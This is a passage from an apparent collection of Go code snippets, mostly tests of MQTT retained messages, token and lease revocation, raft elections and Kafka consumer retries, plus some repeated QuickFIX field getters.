0)\n\tassert.NoError(t, err)\n\tassert.NoError(t, sf.Wait(10*time.Second))\n\tassert.Equal(t, []packet.QOS{0}, sf.ReturnCodes())\n\n\ttime.Sleep(config.MessageRetainWait)\n\n\tpf, err := c.Publish(topic, testPayload, 0, true)\n\tassert.NoError(t, err)\n\tassert.NoError(t, pf.Wait(10*time.Second))\n\n\tsafeReceive(wait)\n\n\ttime.Sleep(config.NoMessageWait)\n\n\terr = c.Disconnect()\n\tassert.NoError(t, err)\n}", "func TestRevoke(t *testing.T) {\n\tc, v, secret := loginHelper(t, \"\")\n\n\t// Make sure that 'secret' contains a valid Pachyderm token\n\t_, err := c.AuthAPIClient.GetAdmins(c.Ctx(), &auth.GetAdminsRequest{})\n\tif err != nil {\n\t\tt.Fatalf(err.Error())\n\t}\n\n\t// Revoke the vault lease in 'secret'\n\tvl := v.Logical()\n\t_, err = vl.Write(\n\t\tfmt.Sprintf(\"/sys/leases/revoke\"),\n\t\tmap[string]interface{}{\"lease_id\": secret.LeaseID},\n\t)\n\tif err != nil {\n\t\tt.Fatalf(err.Error())\n\t}\n\n\t// Make sure that the Pachyderm token in 'secret' has been revoked and no\n\t// longer works\n\t_, err = c.AuthAPIClient.GetAdmins(c.Ctx(), &auth.GetAdminsRequest{})\n\tif err == nil {\n\t\tt.Fatalf(\"expected error with revoked pach token, got none\\n\")\n\t}\n}", "func DirectClearRetainedMessageTest(t *testing.T, config *Config, topic string) {\n\tassert.NoError(t, client.ClearRetainedMessage(client.NewConfig(config.URL), topic, 10*time.Second))\n\n\ttime.Sleep(config.MessageRetainWait)\n\n\tc := client.New()\n\twait := make(chan struct{})\n\n\tc.Callback = func(msg *packet.Message, err error) error {\n\t\tassert.NoError(t, err)\n\t\tassert.Equal(t, topic, msg.Topic)\n\t\tassert.Nil(t, msg.Payload)\n\t\tassert.Equal(t, packet.QOS(0), msg.QOS)\n\t\tassert.False(t, msg.Retain)\n\n\t\tclose(wait)\n\t\treturn nil\n\t}\n\n\tcf, err := c.Connect(client.NewConfig(config.URL))\n\tassert.NoError(t, err)\n\tassert.NoError(t, cf.Wait(10*time.Second))\n\tassert.Equal(t, packet.ConnectionAccepted, cf.ReturnCode())\n\tassert.False(t, cf.SessionPresent())\n\n\tsf, err := c.Subscribe(topic, 0)\n\tassert.NoError(t, err)\n\tassert.NoError(t, sf.Wait(10*time.Second))\n\tassert.Equal(t, []packet.QOS{0}, sf.ReturnCodes())\n\n\ttime.Sleep(config.MessageRetainWait)\n\n\tpf, err := c.Publish(topic, nil, 0, true)\n\tassert.NoError(t, err)\n\tassert.NoError(t, pf.Wait(10*time.Second))\n\n\tsafeReceive(wait)\n\n\ttime.Sleep(config.NoMessageWait)\n\n\terr = c.Disconnect()\n\tassert.NoError(t, err)\n}", "func RetainedMessageReplaceTest(t *testing.T, config *Config, topic string) {\n\tassert.NoError(t, client.ClearRetainedMessage(client.NewConfig(config.URL), topic, 10*time.Second))\n\n\ttime.Sleep(config.MessageRetainWait)\n\n\tretainer := client.New()\n\n\tcf, err := retainer.Connect(client.NewConfig(config.URL))\n\tassert.NoError(t, err)\n\tassert.NoError(t, cf.Wait(10*time.Second))\n\tassert.Equal(t, packet.ConnectionAccepted, cf.ReturnCode())\n\tassert.False(t, cf.SessionPresent())\n\n\tpf, err := retainer.Publish(topic, testPayload, 0, true)\n\tassert.NoError(t, err)\n\tassert.NoError(t, pf.Wait(10*time.Second))\n\n\ttime.Sleep(config.MessageRetainWait)\n\n\tpf, err = retainer.Publish(topic, testPayload2, 0, true)\n\tassert.NoError(t, err)\n\tassert.NoError(t, pf.Wait(10*time.Second))\n\n\ttime.Sleep(config.MessageRetainWait)\n\n\terr = retainer.Disconnect()\n\tassert.NoError(t, err)\n\n\treceiver := client.New()\n\n\twait := make(chan struct{})\n\n\treceiver.Callback = func(msg *packet.Message, err error) error {\n\t\tassert.NoError(t, err)\n\t\tassert.Equal(t, topic, msg.Topic)\n\t\tassert.Equal(t, testPayload2, msg.Payload)\n\t\tassert.Equal(t, packet.QOS(0), msg.QOS)\n\t\tassert.True(t, msg.Retain)\n\n\t\tclose(wait)\n\t\treturn nil\n\t}\n\n\tcf, err = receiver.Connect(client.NewConfig(config.URL))\n\tassert.NoError(t, err)\n\tassert.NoError(t, cf.Wait(10*time.Second))\n\tassert.Equal(t, packet.ConnectionAccepted, cf.ReturnCode())\n\tassert.False(t, cf.SessionPresent())\n\n\tsf, err := receiver.Subscribe(topic, 0)\n\tassert.NoError(t, err)\n\tassert.NoError(t, sf.Wait(10*time.Second))\n\tassert.Equal(t, []packet.QOS{0}, sf.ReturnCodes())\n\n\tsafeReceive(wait)\n\n\ttime.Sleep(config.NoMessageWait)\n\n\terr = receiver.Disconnect()\n\tassert.NoError(t, err)\n}", "func TestReductionTimeout(t *testing.T) {\n\teb, _, streamer, _, _ := launchReductionTest(true, 2)\n\n\t// send a hash to start reduction\n\thash, _ := crypto.RandEntropy(32)\n\n\t// Because round updates are asynchronous (sent through a channel), we wait\n\t// for a bit to let the broker update its round.\n\ttime.Sleep(200 * time.Millisecond)\n\tsendSelection(1, hash, eb)\n\n\ttimer := time.After(1 * time.Second)\n\t<-timer\n\n\tstopChan := make(chan struct{})\n\ttime.AfterFunc(1*time.Second, func() {\n\t\tseenTopics := streamer.SeenTopics()\n\t\tfor _, topic := range seenTopics {\n\t\t\tif topic == topics.Agreement {\n\t\t\t\tt.Fatal(\"\")\n\t\t\t}\n\t\t}\n\n\t\tstopChan <- struct{}{}\n\t})\n\n\t<-stopChan\n}", "func ClearRetainedMessageTest(t *testing.T, config *Config, topic string) {\n\tassert.NoError(t, client.ClearRetainedMessage(client.NewConfig(config.URL), topic, 10*time.Second))\n\n\ttime.Sleep(config.MessageRetainWait)\n\n\tretainer := client.New()\n\n\tcf, err := retainer.Connect(client.NewConfig(config.URL))\n\tassert.NoError(t, err)\n\tassert.NoError(t, cf.Wait(10*time.Second))\n\tassert.Equal(t, packet.ConnectionAccepted, cf.ReturnCode())\n\tassert.False(t, cf.SessionPresent())\n\n\tpf, err := retainer.Publish(topic, testPayload, 0, true)\n\tassert.NoError(t, err)\n\tassert.NoError(t, pf.Wait(10*time.Second))\n\n\ttime.Sleep(config.MessageRetainWait)\n\n\terr = retainer.Disconnect()\n\tassert.NoError(t, err)\n\n\treceiverAndClearer := client.New()\n\n\twait := make(chan struct{})\n\n\treceiverAndClearer.Callback = func(msg *packet.Message, err error) error {\n\t\t// ignore directly send message\n\t\tif msg.Topic == topic && msg.Payload == nil {\n\t\t\treturn nil\n\t\t}\n\n\t\tassert.NoError(t, err)\n\t\tassert.Equal(t, topic, msg.Topic)\n\t\tassert.Equal(t, testPayload, msg.Payload)\n\t\tassert.Equal(t, packet.QOS(0), msg.QOS)\n\t\tassert.True(t, msg.Retain)\n\n\t\tclose(wait)\n\t\treturn nil\n\t}\n\n\tcf, err = receiverAndClearer.Connect(client.NewConfig(config.URL))\n\tassert.NoError(t, err)\n\tassert.NoError(t, cf.Wait(10*time.Second))\n\tassert.Equal(t, packet.ConnectionAccepted, cf.ReturnCode())\n\tassert.False(t, cf.SessionPresent())\n\n\tsf, err := receiverAndClearer.Subscribe(topic, 0)\n\tassert.NoError(t, err)\n\tassert.NoError(t, sf.Wait(10*time.Second))\n\tassert.Equal(t, []packet.QOS{0}, sf.ReturnCodes())\n\n\tsafeReceive(wait)\n\n\ttime.Sleep(config.NoMessageWait)\n\n\tpf, err = receiverAndClearer.Publish(topic, nil, 0, true)\n\tassert.NoError(t, err)\n\tassert.NoError(t, pf.Wait(10*time.Second))\n\n\ttime.Sleep(config.MessageRetainWait)\n\n\terr = receiverAndClearer.Disconnect()\n\tassert.NoError(t, err)\n\n\tnonReceiver := client.New()\n\tnonReceiver.Callback = func(msg *packet.Message, err error) error {\n\t\tassert.Fail(t, \"should not be called\")\n\t\treturn nil\n\t}\n\n\tcf, err = nonReceiver.Connect(client.NewConfig(config.URL))\n\tassert.NoError(t, err)\n\tassert.NoError(t, cf.Wait(10*time.Second))\n\tassert.Equal(t, packet.ConnectionAccepted, cf.ReturnCode())\n\tassert.False(t, cf.SessionPresent())\n\n\tsf, err = nonReceiver.Subscribe(topic, 0)\n\tassert.NoError(t, err)\n\tassert.NoError(t, sf.Wait(10*time.Second))\n\tassert.Equal(t, []packet.QOS{0}, sf.ReturnCodes())\n\n\ttime.Sleep(config.NoMessageWait)\n\n\terr = nonReceiver.Disconnect()\n\tassert.NoError(t, err)\n}", "func (m Message) RepurchaseTerm() (*field.RepurchaseTermField, quickfix.MessageRejectError) {\n\tf := &field.RepurchaseTermField{}\n\terr := m.Body.Get(f)\n\treturn f, err\n}", "func (m Message) RepurchaseTerm() (*field.RepurchaseTermField, quickfix.MessageRejectError) {\n\tf := &field.RepurchaseTermField{}\n\terr := m.Body.Get(f)\n\treturn f, err\n}", "func (m Message) RepurchaseTerm() (*field.RepurchaseTermField, quickfix.MessageRejectError) {\n\tf := &field.RepurchaseTermField{}\n\terr := m.Body.Get(f)\n\treturn f, err\n}", "func (m Message) RepurchaseTerm() (*field.RepurchaseTermField, quickfix.MessageRejectError) {\n\tf := &field.RepurchaseTermField{}\n\terr := m.Body.Get(f)\n\treturn f, err\n}", "func testDelayedRevokeListWithLeaseRequest2() {\n\tst.SetDelay(2) // Lease expires before revoking finishes\n\tdefer st.ResetDelay()\n\n\tkey1 := \"revokelistkey:15\"\n\n\t// function called during revoke of key1\n\tf := func() bool {\n\t\tts := time.Now()\n\t\t// get key1 and want a lease\n\t\treplyL, err := st.GetList(key1, true)\n\t\tif checkErrorStatus(err, replyL.Status, storageproto.OK) {\n\t\t\treturn true\n\t\t}\n\t\tif isTimeOK(time.Since(ts)) {\n\t\t\t// in this case, server should reply old value and refuse lease\n\t\t\tif replyL.Lease.Granted || len(replyL.Value) != 1 || replyL.Value[0] != \"old-value\" {\n\t\t\t\tfmt.Fprintln(output, \"FAIL: server should return old value and not grant lease\")\n\t\t\t\tfailCount++\n\t\t\t\treturn true\n\t\t\t}\n\t\t} else {\n\t\t\tif checkList(replyL.Value, []string{\"old-value\", \"new-value\"}) {\n\t\t\t\treturn true\n\t\t\t}\n\t\t\tif st.comp_revoke[key1] || !replyL.Lease.Granted {\n\t\t\t\tfmt.Fprintln(output, \"FAIL: server should grant lease in this case\")\n\t\t\t\tfailCount++\n\t\t\t\treturn true\n\t\t\t}\n\t\t}\n\t\treturn false\n\t}\n\n\tif delayedRevokeList(key1, f) {\n\t\treturn\n\t}\n\tfmt.Fprintln(output, \"PASS\")\n\tpassCount++\n}", "func TestMsgAppRespWaitReset(t *testing.T) {\n\tsm := newTestRaft(1, []uint64{1, 2, 3}, 5, 1, NewMemoryStorage())\n\tdefer closeAndFreeRaft(sm)\n\tsm.becomeCandidate()\n\tsm.becomeLeader()\n\n\t// The new leader has just emitted a new Term 4 entry; consume those messages\n\t// from the outgoing queue.\n\tsm.bcastAppend()\n\tsm.readMessages()\n\n\t// Node 2 acks the first entry, making it committed.\n\tsm.Step(pb.Message{\n\t\tFrom: 2,\n\t\tType: pb.MsgAppResp,\n\t\tIndex: 1,\n\t})\n\tif sm.raftLog.committed != 1 {\n\t\tt.Fatalf(\"expected committed to be 1, got %d\", sm.raftLog.committed)\n\t}\n\t// Also consume the MsgApp messages that update Commit on the followers.\n\tsm.readMessages()\n\n\t// A new command is now proposed on node 1.\n\tsm.Step(pb.Message{\n\t\tFrom: 1,\n\t\tType: pb.MsgProp,\n\t\tEntries: []pb.Entry{{}},\n\t})\n\n\t// The command is broadcast to all nodes not in the wait state.\n\t// Node 2 left the wait state due to its MsgAppResp, but node 3 is still waiting.\n\tmsgs := sm.readMessages()\n\tif len(msgs) != 1 {\n\t\tt.Fatalf(\"expected 1 message, got %d: %+v\", len(msgs), msgs)\n\t}\n\tif msgs[0].Type != pb.MsgApp || msgs[0].To != 2 {\n\t\tt.Errorf(\"expected MsgApp to node 2, got %v to %d\", msgs[0].Type, msgs[0].To)\n\t}\n\tif len(msgs[0].Entries) != 1 || msgs[0].Entries[0].Index != 2 {\n\t\tt.Errorf(\"expected to send entry 2, but got %v\", msgs[0].Entries)\n\t}\n\n\t// Now Node 3 acks the first entry. This releases the wait and entry 2 is sent.\n\tsm.Step(pb.Message{\n\t\tFrom: 3,\n\t\tType: pb.MsgAppResp,\n\t\tIndex: 1,\n\t})\n\tmsgs = sm.readMessages()\n\tif len(msgs) != 1 {\n\t\tt.Fatalf(\"expected 1 message, got %d: %+v\", len(msgs), msgs)\n\t}\n\tif msgs[0].Type != pb.MsgApp || msgs[0].To != 3 {\n\t\tt.Errorf(\"expected MsgApp to node 3, got %v to %d\", msgs[0].Type, msgs[0].To)\n\t}\n\tif len(msgs[0].Entries) != 1 || msgs[0].Entries[0].Index != 2 {\n\t\tt.Errorf(\"expected to send entry 2, but got %v\", msgs[0].Entries)\n\t}\n}", "func TestValidateBasicMsgCreateMaxSupplyDenomTokenDenomMismatchGivesError(t *testing.T) {\n\tmessage := newValidMsgCreateBond()\n\tmessage.Token = message.MaxSupply.Denom + \"a\" // to ensure different\n\n\terr := message.ValidateBasic()\n\trequire.NotNil(t, err)\n}", "func TestLessorRevoke(t *testing.T) {\n\tlg := zap.NewNop()\n\tdir, be := NewTestBackend(t)\n\tdefer os.RemoveAll(dir)\n\tdefer be.Close()\n\n\tle := newLessor(lg, be, clusterLatest(), LessorConfig{MinLeaseTTL: minLeaseTTL})\n\tdefer le.Stop()\n\tvar fd *fakeDeleter\n\tle.SetRangeDeleter(func() TxnDelete {\n\t\tfd = newFakeDeleter(be)\n\t\treturn fd\n\t})\n\n\t// grant a lease with long term (100 seconds) to\n\t// avoid early termination during the test.\n\tl, err := le.Grant(1, 100)\n\tif err != nil {\n\t\tt.Fatalf(\"could not grant lease for 100s ttl (%v)\", err)\n\t}\n\n\titems := []LeaseItem{\n\t\t{\"foo\"},\n\t\t{\"bar\"},\n\t}\n\n\tif err = le.Attach(l.ID, items); err != nil {\n\t\tt.Fatalf(\"failed to attach items to the lease: %v\", err)\n\t}\n\n\tif err = le.Revoke(l.ID); err != nil {\n\t\tt.Fatal(\"failed to revoke lease:\", err)\n\t}\n\n\tif le.Lookup(l.ID) != nil {\n\t\tt.Errorf(\"got revoked lease %x\", l.ID)\n\t}\n\n\twdeleted := []string{\"bar_\", \"foo_\"}\n\tsort.Strings(fd.deleted)\n\tif !reflect.DeepEqual(fd.deleted, wdeleted) {\n\t\tt.Errorf(\"deleted= %v, want %v\", fd.deleted, wdeleted)\n\t}\n\n\ttx := be.BatchTx()\n\ttx.Lock()\n\tdefer tx.Unlock()\n\tlpb := schema.MustUnsafeGetLease(tx, int64(l.ID))\n\tif lpb != nil {\n\t\tt.Errorf(\"lpb = %d, want nil\", lpb)\n\t}\n}", "func TestLearnerCannotVote(t *testing.T) {\n\tn2 := newTestLearnerRaft(2, []uint64{1}, []uint64{2}, 10, 1, NewMemoryStorage())\n\tdefer closeAndFreeRaft(n2)\n\n\tn2.becomeFollower(1, None)\n\n\tn2.Step(pb.Message{From: 1, To: 2, Term: 2, Type: pb.MsgVote, LogTerm: 11, Index: 11})\n\n\tif len(n2.msgs) != 0 {\n\t\tt.Errorf(\"expect learner not to vote, but received %v messages\", n2.msgs)\n\t}\n}", "func testNonleadersElectionTimeoutNonconflict(t *testing.T, state StateType) {\n\tet := 10\n\tsize := 5\n\trs := make([]*raft, size)\n\tids := idsBySize(size)\n\tfor k := range rs {\n\t\trs[k] = newTestRaft(ids[k], ids, et, 1, NewMemoryStorage())\n\t}\n\tdefer func() {\n\t\tfor k := range rs {\n\t\t\tcloseAndFreeRaft(rs[k])\n\t\t}\n\t}()\n\tconflicts := 0\n\tfor round := 0; round < 1000; round++ {\n\t\tfor _, r := range rs {\n\t\t\tswitch state {\n\t\t\tcase StateFollower:\n\t\t\t\tr.becomeFollower(r.Term+1, None)\n\t\t\tcase StateCandidate:\n\t\t\t\tr.becomeCandidate()\n\t\t\t}\n\t\t}\n\n\t\ttimeoutNum := 0\n\t\tfor timeoutNum == 0 {\n\t\t\tfor _, r := range rs {\n\t\t\t\tr.tick()\n\t\t\t\tif len(r.readMessages()) > 0 {\n\t\t\t\t\ttimeoutNum++\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t\t// several rafts time out at the same tick\n\t\tif timeoutNum > 1 {\n\t\t\tconflicts++\n\t\t}\n\t}\n\n\tif g := float64(conflicts) / 1000; g > 0.3 {\n\t\tt.Errorf(\"probability of conflicts = %v, want <= 0.3\", g)\n\t}\n}", "func TestRestoreInvalidLearner(t *testing.T) {\n\ts := pb.Snapshot{\n\t\tMetadata: pb.SnapshotMetadata{\n\t\t\tIndex: 11, // magic number\n\t\t\tTerm: 11, // magic number\n\t\t\tConfState: pb.ConfState{Nodes: []uint64{1, 2}, Learners: []uint64{3}},\n\t\t},\n\t}\n\n\tstorage := NewMemoryStorage()\n\tsm := newTestRaft(3, []uint64{1, 2, 3}, 10, 1, storage)\n\tdefer closeAndFreeRaft(sm)\n\n\tif sm.isLearner {\n\t\tt.Errorf(\"%x is learner, want not\", sm.id)\n\t}\n\tif ok := sm.restore(s); ok {\n\t\tt.Error(\"restore succeed, want fail\")\n\t}\n}", "func TestTokenRevoke(t *testing.T) {\n\tif testing.Short() {\n\t\tt.Skip(\"Skipping integration tests in short mode\")\n\t}\n\tdeleteAll(t)\n\tadminClient := getPachClient(t, admin)\n\n\t// Create repo (so alice has something to list)\n\trepo := tu.UniqueString(\"TestTokenRevoke\")\n\trequire.NoError(t, adminClient.CreateRepo(repo))\n\n\talice := tu.UniqueString(\"alice\")\n\tresp, err := adminClient.GetAuthToken(adminClient.Ctx(), &auth.GetAuthTokenRequest{\n\t\tSubject: alice,\n\t})\n\trequire.NoError(t, err)\n\taliceClient := adminClient.WithCtx(context.Background())\n\taliceClient.SetAuthToken(resp.Token)\n\n\t// alice's token is valid\n\trepos, err := aliceClient.ListRepo()\n\trequire.NoError(t, err)\n\trequire.ElementsEqualUnderFn(t, []string{repo}, repos, RepoInfoToName)\n\n\t// admin revokes token\n\t_, err = adminClient.RevokeAuthToken(adminClient.Ctx(), &auth.RevokeAuthTokenRequest{\n\t\tToken: resp.Token,\n\t})\n\trequire.NoError(t, err)\n\n\t// alice's token is no longer valid\n\trepos, err = aliceClient.ListRepo()\n\trequire.True(t, auth.IsErrBadToken(err), err.Error())\n\trequire.Equal(t, 0, len(repos))\n}", "func TestReqRespServerErr(t *testing.T) {\n\t// Connect to NATS\n\tm := NewMessenger(testConfig)\n\tdefer m.Close()\n\n\t// Use a WaitGroup to wait for the message to arrive\n\twg := sync.WaitGroup{}\n\twg.Add(1)\n\n\t// Subscribe to the source subject with the message processing function\n\ttestSubject := \"test_subject\"\n\ttestMsgContent := []byte(\"Some text to send...\")\n\ttestRespErr := errors.New(\"Server error\")\n\tm.Response(testSubject, func(content []byte) ([]byte, error) {\n\t\tdefer wg.Done()\n\t\trequire.EqualValues(t, content, testMsgContent)\n\t\treturn nil, testRespErr\n\t})\n\n\t// Send a message\n\tresp, err := m.Request(testSubject, testMsgContent, 50*time.Millisecond)\n\tassert.Nil(t, err)\n\trequire.EqualValues(t, resp, testRespErr.Error())\n\n\t// Wait for the message to come in\n\twg.Wait()\n}", "func TestVoter(t *testing.T) {\n\ttests := []struct {\n\t\tents []pb.Entry\n\t\tlogterm uint64\n\t\tindex uint64\n\n\t\twreject bool\n\t}{\n\t\t// same logterm\n\t\t{[]pb.Entry{{Term: 1, Index: 1}}, 1, 1, false},\n\t\t{[]pb.Entry{{Term: 1, Index: 1}}, 1, 2, false},\n\t\t{[]pb.Entry{{Term: 1, Index: 1}, {Term: 1, Index: 2}}, 1, 1, true},\n\t\t// candidate higher logterm\n\t\t{[]pb.Entry{{Term: 1, Index: 1}}, 2, 1, false},\n\t\t{[]pb.Entry{{Term: 1, Index: 1}}, 2, 2, false},\n\t\t{[]pb.Entry{{Term: 1, Index: 1}, {Term: 1, Index: 2}}, 2, 1, false},\n\t\t// voter higher logterm\n\t\t{[]pb.Entry{{Term: 2, Index: 1}}, 1, 1, true},\n\t\t{[]pb.Entry{{Term: 2, Index: 1}}, 1, 2, true},\n\t\t{[]pb.Entry{{Term: 2, Index: 1}, {Term: 1, Index: 2}}, 1, 1, true},\n\t}\n\tfor i, tt := range tests {\n\t\tstorage := NewMemoryStorage()\n\t\tstorage.Append(tt.ents)\n\t\tr := newTestRaft(1, []uint64{1, 2}, 10, 1, storage)\n\t\tdefer closeAndFreeRaft(r)\n\n\t\tr.Step(pb.Message{From: 2, To: 1, Type: pb.MsgVote, Term: 3, LogTerm: tt.logterm, Index: tt.index})\n\n\t\tmsgs := r.readMessages()\n\t\tif len(msgs) != 1 {\n\t\t\tt.Fatalf(\"#%d: len(msg) = %d, want %d\", i, len(msgs), 1)\n\t\t}\n\t\tm := msgs[0]\n\t\tif m.Type != pb.MsgVoteResp {\n\t\t\tt.Errorf(\"#%d: msgType = %d, want %d\", i, m.Type, pb.MsgVoteResp)\n\t\t}\n\t\tif m.Reject != tt.wreject {\n\t\t\tt.Errorf(\"#%d: reject = %t, want %t\", i, m.Reject, tt.wreject)\n\t\t}\n\t}\n}", "func testDelayedRevokeListWithLeaseRequest1() {\n\tst.SetDelay(0.5) // Revoke finishes before lease expires\n\tdefer st.ResetDelay()\n\n\tkey1 := \"revokelistkey:5\"\n\n\t// function called during revoke of key1\n\tf := func() bool {\n\t\tts := time.Now()\n\t\t// get key1 and want a lease\n\t\treplyL, err := st.GetList(key1, true)\n\t\tif checkErrorStatus(err, replyL.Status, storageproto.OK) {\n\t\t\treturn true\n\t\t}\n\t\tif isTimeOK(time.Since(ts)) {\n\t\t\t// in this case, server should reply old value and refuse lease\n\t\t\tif replyL.Lease.Granted || len(replyL.Value) != 1 || replyL.Value[0] != \"old-value\" {\n\t\t\t\tfmt.Fprintln(output, \"FAIL: server should return old value and not grant lease\")\n\t\t\t\tfailCount++\n\t\t\t\treturn true\n\t\t\t}\n\t\t} else {\n\t\t\tif checkList(replyL.Value, []string{\"old-value\", \"new-value\"}) {\n\t\t\t\treturn true\n\t\t\t}\n\t\t\tif !st.comp_revoke[key1] || !replyL.Lease.Granted {\n\t\t\t\tfmt.Fprintln(output, \"FAIL: server should grant lease in this case\")\n\t\t\t\tfailCount++\n\t\t\t\treturn true\n\t\t\t}\n\t\t}\n\t\treturn false\n\t}\n\n\tif delayedRevokeList(key1, f) {\n\t\treturn\n\t}\n\tfmt.Fprintln(output, \"PASS\")\n\tpassCount++\n}", "func RetainedWillTest(t *testing.T, config *Config, topic string) {\n\tassert.NoError(t, client.ClearRetainedMessage(client.NewConfig(config.URL), topic, 10*time.Second))\n\n\ttime.Sleep(config.MessageRetainWait)\n\n\tclientWithRetainedWill := client.New()\n\n\topts := client.NewConfig(config.URL)\n\topts.WillMessage = &packet.Message{\n\t\tTopic: topic,\n\t\tPayload: testPayload,\n\t\tQOS: 0,\n\t\tRetain: true,\n\t}\n\n\tcf, err := clientWithRetainedWill.Connect(opts)\n\tassert.NoError(t, err)\n\tassert.NoError(t, cf.Wait(10*time.Second))\n\tassert.Equal(t, packet.ConnectionAccepted, cf.ReturnCode())\n\tassert.False(t, cf.SessionPresent())\n\n\terr = clientWithRetainedWill.Close()\n\tassert.NoError(t, err)\n\n\ttime.Sleep(config.MessageRetainWait)\n\n\treceiver := client.New()\n\twait := make(chan struct{})\n\n\treceiver.Callback = func(msg *packet.Message, err error) error {\n\t\tassert.NoError(t, err)\n\t\tassert.Equal(t, topic, msg.Topic)\n\t\tassert.Equal(t, testPayload, msg.Payload)\n\t\tassert.Equal(t, packet.QOS(0), msg.QOS)\n\t\tassert.True(t, msg.Retain)\n\n\t\tclose(wait)\n\t\treturn nil\n\t}\n\n\tcf, err = receiver.Connect(client.NewConfig(config.URL))\n\tassert.NoError(t, err)\n\tassert.NoError(t, cf.Wait(10*time.Second))\n\tassert.Equal(t, packet.ConnectionAccepted, cf.ReturnCode())\n\tassert.False(t, cf.SessionPresent())\n\n\tsf, err := receiver.Subscribe(topic, 0)\n\tassert.NoError(t, err)\n\tassert.NoError(t, sf.Wait(10*time.Second))\n\tassert.Equal(t, []packet.QOS{0}, sf.ReturnCodes())\n\n\tsafeReceive(wait)\n\n\ttime.Sleep(config.NoMessageWait)\n\n\terr = receiver.Disconnect()\n\tassert.NoError(t, err)\n}", "func (m Message) GetRepurchaseTerm(f *field.RepurchaseTermField) quickfix.MessageRejectError {\n\treturn m.Body.Get(f)\n}", "func (m Message) GetRepurchaseTerm(f *field.RepurchaseTermField) quickfix.MessageRejectError {\n\treturn m.Body.Get(f)\n}", "func (m Message) GetRepurchaseTerm(f *field.RepurchaseTermField) quickfix.MessageRejectError {\n\treturn m.Body.Get(f)\n}", "func (m Message) GetRepurchaseTerm(f *field.RepurchaseTermField) quickfix.MessageRejectError {\n\treturn m.Body.Get(f)\n}", "func testDelayedRevokeWithUpdate2() {\n\tst.SetDelay(2) // lease expires before revocation completes\n\tdefer st.ResetDelay()\n\n\tkey1 := \"revokekey:7\"\n\n\t// function called during revoke of key1\n\tf := func() bool {\n\t\tts := time.Now()\n\t\t// put key1, this should block\n\t\treplyP, err := st.Put(key1, \"newnew-value\")\n\t\tif checkErrorStatus(err, replyP.Status, storageproto.OK) {\n\t\t\treturn true\n\t\t}\n\t\td := time.Since(ts)\n\t\tif d < (storageproto.LEASE_SECONDS+storageproto.LEASE_GUARD_SECONDS-1)*time.Second {\n\t\t\tfmt.Fprintln(output, \"FAIL: storage server should hold this Put until leases expires key1\")\n\t\t\tfailCount++\n\t\t\treturn true\n\t\t}\n\t\tif st.comp_revoke[key1] {\n\t\t\tfmt.Fprintln(output, \"FAIL: storage server should not block this Put till the lease revoke of key1\")\n\t\t\tfailCount++\n\t\t\treturn true\n\t\t}\n\t\treplyG, err := st.Get(key1, false)\n\t\tif checkErrorStatus(err, replyG.Status, storageproto.OK) {\n\t\t\treturn true\n\t\t}\n\t\tif replyG.Value != \"newnew-value\" {\n\t\t\tfmt.Fprintln(output, \"FAIL: got wrong value\")\n\t\t\tfailCount++\n\t\t\treturn true\n\t\t}\n\t\treturn false\n\t}\n\n\tif delayedRevoke(key1, f) {\n\t\treturn\n\t}\n\tfmt.Fprintln(output, \"PASS\")\n\tpassCount++\n}", "func testDelayedRevokeWithoutBlocking() {\n\tst.SetDelay(0.5)\n\tdefer st.ResetDelay()\n\n\tkey1 := \"revokekey:3\"\n\tkey2 := \"revokekey:4\"\n\n\t// function called during revoke of key1\n\tf := func() bool {\n\t\tts := time.Now()\n\t\t// put key2, this should not block\n\t\treplyP, err := st.Put(key2, \"value\")\n\t\tif checkErrorStatus(err, replyP.Status, storageproto.OK) {\n\t\t\treturn true\n\t\t}\n\t\tif !isTimeOK(time.Since(ts)) {\n\t\t\tfmt.Fprintln(output, \"FAIL: concurrent Put got blocked\")\n\t\t\tfailCount++\n\t\t\treturn true\n\t\t}\n\n\t\tts = time.Now()\n\t\t// get key2, this should not block\n\t\treplyG, err := st.Get(key2, false)\n\t\tif checkErrorStatus(err, replyG.Status, storageproto.OK) {\n\t\t\treturn true\n\t\t}\n\t\tif replyG.Value != \"value\" {\n\t\t\tfmt.Fprintln(output, \"FAIL: get got wrong value\")\n\t\t\tfailCount++\n\t\t\treturn true\n\t\t}\n\t\tif !isTimeOK(time.Since(ts)) {\n\t\t\tfmt.Fprintln(output, \"FAIL: concurrent Get got blocked\")\n\t\t\tfailCount++\n\t\t\treturn true\n\t\t}\n\t\treturn false\n\t}\n\n\tif delayedRevoke(key1, f) {\n\t\treturn\n\t}\n\tfmt.Fprintln(output, \"PASS\")\n\tpassCount++\n}", "func (s *PartitionCsmSuite) TestSeveralMessageReties(c *C) {\n\toffsetsBefore := s.kh.GetOldestOffsets(topic)\n\ts.cfg.Consumer.AckTimeout = 100 * time.Millisecond\n\tretriesEmergencyBreak = 4\n\tretriesHighWaterMark = 1\n\ts.kh.SetOffsets(group, topic, []offsetmgr.Offset{{Val: sarama.OffsetOldest}})\n\n\tpc := Spawn(s.ns, group, topic, partition, s.cfg, s.groupMember, s.msgIStreamF, s.offsetMgrF)\n\tdefer pc.Stop()\n\n\t// Read and confirm offered several messages, but do not ack them.\n\tfor i := 0; i < 7; i++ {\n\t\tmsg := <-pc.Messages()\n\t\tsendEOffered(msg)\n\t}\n\t// Wait for all offers to expire...\n\ttime.Sleep(100 * time.Millisecond)\n\t// ...first message we read is not a retry and this is ok...\n\tmsg := <-pc.Messages()\n\tsendEOffered(msg)\n\tc.Assert(msg.Offset, Equals, offsetsBefore[partition]+int64(7))\n\t// ...but following 7 are.\n\tfor i := 0; i < 7; i++ {\n\t\tmsg := <-pc.Messages()\n\t\tsendEOffered(msg)\n\t\tc.Assert(msg.Offset, Equals, offsetsBefore[partition]+int64(i))\n\t}\n}", "func TestNodeWithSmallerTermCanCompleteElection(t *testing.T) {\n\tn1 := newTestRaft(1, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage())\n\tn2 := newTestRaft(2, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage())\n\tn3 := newTestRaft(3, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage())\n\tdefer closeAndFreeRaft(n1)\n\tdefer closeAndFreeRaft(n2)\n\tdefer closeAndFreeRaft(n3)\n\n\tn1.becomeFollower(1, None)\n\tn2.becomeFollower(1, None)\n\tn3.becomeFollower(1, None)\n\n\tn1.preVote = true\n\tn2.preVote = true\n\tn3.preVote = true\n\n\t// cause a network partition to isolate node 3\n\tnt := newNetwork(n1, n2, n3)\n\tnt.cut(1, 3)\n\tnt.cut(2, 3)\n\n\tnt.send(pb.Message{From: 1, To: 1, Type: 